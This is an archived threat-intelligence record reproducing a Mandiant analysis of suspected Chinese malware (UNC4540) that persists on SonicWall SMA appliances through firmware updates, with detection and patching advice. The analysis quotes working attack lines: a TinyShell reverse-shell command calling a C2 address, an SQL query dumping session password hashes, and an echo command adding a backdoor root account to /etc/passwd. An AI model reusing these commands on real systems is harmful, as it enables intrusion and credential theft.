{
	"id": "3b4f5aef-1fdc-40d4-ae72-3051c3e84c22",
	"created_at": "2026-04-06T00:09:47.931286Z",
	"updated_at": "2026-04-10T03:22:38.59548Z",
	"deleted_at": null,
	"sha1_hash": "10d613b8c6a00696dbae386eabeac0f93b46c252",
	"title": "Suspected Chinese Campaign to Persist on SonicWall Devices, Highlights Importance of Monitoring Edge Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66689,
	"plain_text": "Suspected Chinese Campaign to Persist on SonicWall Devices,\r\nHighlights Importance of Monitoring Edge Devices\r\nBy Mandiant\r\nPublished: 2023-03-08 · Archived: 2026-04-02 10:37:32 UTC\r\nWritten by: Daniel Lee, Stephen Eckels, Ben Read\r\nMandiant, working in partnership with SonicWall Product Security and Incident Response Team (PSIRT), has\r\nidentified a suspected Chinese campaign that involves maintaining long term persistence by running malware on\r\nan unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has functionality to steal user\r\ncredentials, provide shell access, and persist through firmware upgrades. Mandiant currently tracks this actor as\r\nUNC4540.\r\nMalware\r\nAnalysis of a compromised device revealed a collection of files that give the attacker a highly privileged and\r\navailable access to the appliance. The malware consists of a series of bash scripts and a single ELF binary\r\nidentified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed\r\nunderstanding of the appliance and is well tailored to the system to provide stability and persistence. Table 1\r\ncontains a list of the malicious files.\r\nPath Hash Function\r\n/bin/firewalld e4117b17e3d14fe64f45750be71dbaa6 Main malware process\r\n/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell backdoor\r\n/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Boot persistence for firewalld\r\n/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Redundant main malware process\r\n/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware backdoor script\r\n/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Graceful shutdown script\r\nTable 1: Malware files\r\nMain Module\r\nThe main malware entry point is a bash script named firewalld , which executes its primary loop once for a\r\ncount of every file on the system squared: … for j in $(ls / -R) do for i in $(ls / -R) do: … The script is\r\nhttps://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nPage 1 of 4\n\nresponsible for executing an SQL command to accomplish credential stealing and execution of the other\r\ncomponents.\r\nThe first function in firewalld executes the TinyShell backdoor httpsd with command nohup /bin/httpsd -\r\nc\u003cC2 IP ADDRESS\u003e -d 5 -m -1 -p 51432 \u003e /dev/null 2\u003e\u00261 \u0026 if the httpsd process isn’t already running. This\r\nsets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a\r\nspecific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary\r\nembeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It\r\nalso has a listening bind shell mode available.\r\nPrimary Purpose is Likely Credential Theft\r\nThe primary purpose of the malware appears to be to steal hashed credentials from all logged in users. It does this\r\nin firewalld by routinely executing the SQL command select userName,password from Sessions against\r\nsqlite3 database /tmp/temp.db and copying them out to the attacker created text file /tmp/syslog.db . The\r\nsource database /tmp/temp.db is used by the appliance to track session information, including hashed\r\ncredentials. Once retrieved by the attacker the hashes could be cracked offline.\r\nImplementation Shows Emphasis on Persistence and Stability\r\nThe attackers put significant effort into the stability and persistence of their tooling. This allows their access to the\r\nnetwork to persist through firmware updates and maintain a foothold on the network through the SonicWall\r\nDevice.\r\nRedundant Scripts\r\nThe startup script rc.local runs firewalld at boot time, but efforts to ensure stability and persistence extend\r\nbeyond that, with functionality designed to enable long-term attacker access.\r\nA second copy of firewalld named iptabled was also present on the device. iptabled was modified to\r\nprovide persistence for the main malware process in case of exit or crash. The two scripts were configured to call\r\nthe other if it was not running, providing a backup instance of the main malware process and therefore an\r\nadditional layer of resilience.\r\nFirmware Updates Modified to Allow Persistence, Create new Root\r\nIn addition to ensuring stability, the attackers implemented a process for ensuring their access would persist across\r\nfirmware updates. The bash script geoBotnetd checks every ten seconds for a new firmware upgrade to appear at\r\n/cf/FIRMWARE/NEW/INITRD.GZ . If it does, the script will copy the file for backup, unzip it, mount it, and then copy\r\nover the whole package of malware files. geoBotnetd also executes echo -e\r\n\"acme:wegB/YNBuL7QI:0:0:pwned:/acme:/bin/bash\\n\" \u003e\u003e /sda/etc/passwd , which adds backdoor root user\r\nacme to the system. Then it rezips everything and puts it back in place with all the malware included, ready for\r\ninstallation. The technique is not especially sophisticated, but it does show considerable effort on the part of the\r\nattacker to understand the appliance update cycle, then develop and test a method for persistence.\r\nhttps://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nPage 2 of 4\n\nThe techniques used here, including backdooring update zips and modifying appliance binaries, is consistent with\r\nthose described in Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN\r\nDevices, although Mandiant tracks these threats separately.\r\nThese firmware manipulations only occurred post-exploitation on an already infected device, and were not seen\r\nused in a supply chain attack.\r\nPatch Applied to Binary, Potentially to Increase Stability\r\nIn a similar vein that shows the effort put into tailoring the malware, the main firewalld script includes a\r\nfunction to add a small patch to the legitimate SonicWall binary firebased . It uses a simple sed command to\r\nreplace the string /sbin/shutdown -r now with bash /bin/ifconfig6 in the binary and then creates script\r\n/bin/ifconfig6 with contents.\r\n#!/bin/sh\r\nifconfig eth0 down\r\nsleep 90\r\n/sbin/shutdown -r now\r\nMandiant did not delve into detail on how this would affect the appliance or under what conditions it would have\r\nan impact, but it is clear from the change that this was intended to provide a graceful close-down of the network\r\ncontroller before executing the shutdown command. It is likely that the attackers have encountered issues either in\r\nuse or testing when firebased shuts down the appliance.\r\nLong Term Operation, Initial Infection Vector Unknown\r\nMandiant was not able to determine the origin of the infection, however, the malware, or a predecessor of it, was\r\nlikely deployed in 2021. Mandiant believes that attacker access has persisted through multiple firmware updates.\r\nDetect and Defend\r\nFirst and foremost, maintaining proper patch management is essential for mitigating the risk of vulnerability\r\nexploitation. At the time of publishing this blog post, SonicWall urges SMA100 customers to upgrade to 10.2.1.7\r\nor higher, which includes hardening enhancements such as File Integrity Monitoring (FIM) and anomalous\r\nprocess identification. A SonicWall blog post describing the patch features is available (New SMA Release\r\nUpdates OpenSSL Library, Includes Key Security Features) and the patch itself can be found here: Upgrade Path\r\nFor SMA100 Series.\r\nTo help keep customers secure, SMA100 customers on versions 10.2.1.7 or higher will receive notifications in\r\ntheir Management Console about pending CRITICAL security updates.\r\nGiven the difficulty in directly examining impacted devices, reviewing available logs for secondary signs of\r\ncompromise, such as abnormal logins or internal traffic, may offer some opportunities for detection. However,\r\napplying the recent patch is the best way to limit any unexpected tampering or modification of the appliance.\r\nhttps://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nPage 3 of 4\n\nA Pattern of Chinese Network Device Compromises\r\nDeveloping malware for a managed appliance is often no trivial task. Vendors typically do not enable direct access\r\nto the Operating System or filesystem for users, instead offering administrators a graphical UI or limited\r\nCommand Line Interface (CLI) with guardrails preventing anyone from accidentally breaking the system. Because\r\nof this lack of access, attackers require a fair amount of resource and effort to develop exploits and malware for\r\nmanaged devices.\r\nIn recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of internet\r\nfacing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent\r\npattern that Mandiant expects to continue in the near term. For further information, see Mandiant blog post:\r\nSuspected Chinese Threat Actors Exploiting FortiOS Vulnerability (CVE-2022-42475). In particular the section\r\n\"China Continues to Focus on Network Devices\" summarizes some of Mandiant’s recent findings.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nhttps://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall"
	],
	"report_names": [
		"suspected-chinese-persist-sonicwall"
	],
	"threat_actors": [
		{
			"id": "d54d2676-266b-4bf1-b82c-e8fc576f08ff",
			"created_at": "2024-09-20T02:00:04.563465Z",
			"updated_at": "2026-04-10T02:00:03.690637Z",
			"deleted_at": null,
			"main_name": "UNC4540",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC4540",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434187,
	"ts_updated_at": 1775791358,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.pdf",
		"text": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.txt",
		"img": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.jpg"
	}
}